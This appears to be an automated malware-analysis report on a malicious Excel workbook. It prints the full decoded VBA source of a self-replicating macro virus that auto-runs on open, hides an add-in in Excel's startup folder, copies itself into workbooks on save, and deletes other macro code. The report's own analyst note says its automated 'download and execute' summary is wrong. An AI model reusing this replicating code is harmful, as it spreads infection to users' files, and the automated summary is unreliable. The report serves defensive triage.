MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
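The sample is a malicious Excel file containing a Workbook_Open VBA macro. This macro attempts to download and execute a second-stage payload named '0KILLBASE.XLS' from the startup path. It also checks for and potentially creates an entry for 'BASE5874.XLS' in the startup path, indicating an attempt to establish persistence. Analyst note: the extracted macro shown below contains no network or download call. It builds '0KILLBASE.XLS' locally as an add-in in Excel's startup path by copying its own ThisWorkbook code, re-copies that code into workbooks as they are saved, and deletes 'BASE5874.XLS' from the startup path if it is present rather than creating it. Persistence through an Excel startup-folder add-in is arguably closer to Office Application Startup (T1137) than to Registry Run Keys / Startup Folder; treat the summary above and the T1547.001 mapping as needing verification against the macro source.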
Heuristics 3
-
ClamAV: Xls.Trojan.AnitiDivi-2 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Trojan.AnitiDivi-2
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS | Document contains VBA macro code
-
Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2897 bytes |
SHA-256: 38af40163a323d702e588502d6103028d3e9cb524d456a2ad9d432290d466994 |
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Application-level event sink. Once Workbook_Open assigns it (Set mapp = Application),
' the mapp_* handlers in this module run for workbooks opened or saved in the same
' Excel session, not only for this workbook.
Private WithEvents mapp As Application
Attribute mapp.VB_VarHelpID = -1
' File name of the add-in copy this macro looks for, and creates if missing, in
' Application.StartupPath. Useful as a host indicator when triaging.
Private Const cstrKillEngine As String = "0KILLBASE.XLS"
' Auto-run entry point: Excel calls this when the workbook carrying the macro is opened.
' Analyst summary of what the visible code does:
'   1. Removes BASE5874.XLS from Excel's startup folder if it exists.
'   2. If this workbook IS the startup-folder copy (0KILLBASE.XLS), hooks application events.
'   3. Otherwise, if no such copy exists yet, creates one as a hidden add-in carrying this code.
' No network access or download appears anywhere in this routine.
Private Sub Workbook_Open()
Dim BaseName As String
Dim myName As String
Dim wbkKillEngine As Workbook
Dim strKillEngine As String
' myName is declared but never used in this routine.
BaseName = Application.StartupPath + "\BASE5874.XLS"
' Dir() returns an empty string when the file is absent, so this branch runs only if it exists.
If Len(Dir(BaseName)) <> 0 Then
' x is not declared anywhere in the listing (no Option Explicit is visible), so it is an implicit Variant.
' The file is opened and closed before deletion; presumably this lets the application-level
' WorkbookOpen handler act on it when the hook is active - TODO confirm.
Set x = Application.Workbooks.Open(BaseName)
x.Close
' Deletes BASE5874.XLS from disk; it is removed, not created.
Kill BaseName
' NOTE(review): the message text and caption look mis-decoded by the extractor (presumably a
' legacy CJK code page); they are runtime strings and are left exactly as extracted.
MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
End If
' Full upper-cased path of the startup-folder copy, used for a case-insensitive comparison below.
strKillEngine = UCase$(Application.StartupPath + "\" + cstrKillEngine)
If UCase$(Me.FullName) = strKillEngine Then
' Running from the startup-folder copy: make sure the folder exists, then subscribe to
' application-wide events so mapp_WorkbookOpen / mapp_WorkbookBeforeSave start firing.
If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath
Set mapp = Application
ElseIf Len(Dir(strKillEngine)) = 0 Then
' Running from some other workbook and no startup-folder copy exists yet: create it.
' Screen updating is switched off for the duration, which hides the temporary workbook from the user.
Application.ScreenUpdating = False
Set wbkKillEngine = Workbooks.Add
' Add-in workbooks have no visible window in Excel.
wbkKillEngine.IsAddin = True
' Copies this module's code into the new workbook; the Boolean result is ignored.
Intrude wbkKillEngine
' Persistence artifact: an add-in file written into Excel's startup folder, which Excel loads on launch.
wbkKillEngine.SaveAs strKillEngine, xlAddIn
wbkKillEngine.Close
Application.ScreenUpdating = True
End If
End Sub
' Application-level handler: runs for each workbook opened while mapp is hooked.
' Searches the opened workbook's ThisWorkbook module for a marker string and, if found,
' wipes that module's code and saves the workbook.
' Wb - the workbook that was just opened.
Private Sub mapp_WorkbookOpen(ByVal Wb As Workbook)
Dim cmdTarget As Object
' All runtime errors are suppressed from here on, so a failed VBProject access is silent.
' NOTE(review): programmatic VBProject access presumably depends on Excel's
' "Trust access to the VBA project object model" setting - confirm on the affected host.
On Error Resume Next
Set cmdTarget = Wb.VBProject.VBComponents("ThisWorkbook").CodeModule
' Find(target, startLine, startColumn, endLine, endColumn): looks only in lines 1-20, columns 1-41.
' The marker is "cstrEngine", which differs from this sample's own constant cstrKillEngine, so the
' match is aimed at other macro code - presumably the BASE5874 macro named in the message; verify.
If cmdTarget.Find("Private Const cstrEngine As String =", 1, 1, 20, 41) Then
' Deletes every line of the matched module, then writes the modified workbook back to disk
' without asking the user.
cmdTarget.DeleteLines 1, cmdTarget.CountOfLines
Wb.Save
' NOTE(review): text and caption appear mis-decoded by the extractor; left exactly as extracted.
MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
End If
End Sub
' Replication routine: copies the full source of this workbook's ThisWorkbook module into the
' ThisWorkbook module of wbkTarget, but only when the target module holds at most two lines.
' wbkTarget - workbook that receives the code.
' Returns True when the copy branch ran, False otherwise; both visible callers ignore the result.
Private Function Intrude(wbkTarget As Workbook) As Boolean
Dim cmdSource As Object
Dim cmdTarget As Object
' Errors are suppressed, so a blocked or failed VBProject access leaves no visible trace.
On Error Resume Next
Intrude = False
Set cmdSource = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
Set cmdTarget = wbkTarget.VBProject.VBComponents("ThisWorkbook").CodeModule
' Targets with more than two lines in ThisWorkbook are skipped, so existing macro code there is
' not overwritten.
If cmdTarget.CountOfLines <= 2 Then
' The delete count is taken from the SOURCE module rather than the target; with errors
' suppressed, a resulting failure would pass unnoticed.
cmdTarget.DeleteLines 1, cmdSource.CountOfLines
' Inserts the whole source module, which includes Workbook_Open, so the target will auto-run
' the same code the next time it is opened.
cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)
Intrude = True
End If
End Function
' Application-level handler: runs before any workbook in the hooked Excel session is saved and
' passes that workbook to Intrude, which is how the macro spreads to other files.
' Wb - workbook about to be saved; SaveAsUI and Cancel are not used.
' Triage note: workbooks saved on a host where 0KILLBASE.XLS was loaded should be checked for an
' unexpected Workbook_Open macro in ThisWorkbook.
Private Sub mapp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
' Errors are suppressed so the save proceeds normally whether or not the copy succeeds.
On Error Resume Next
Intrude Wb
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||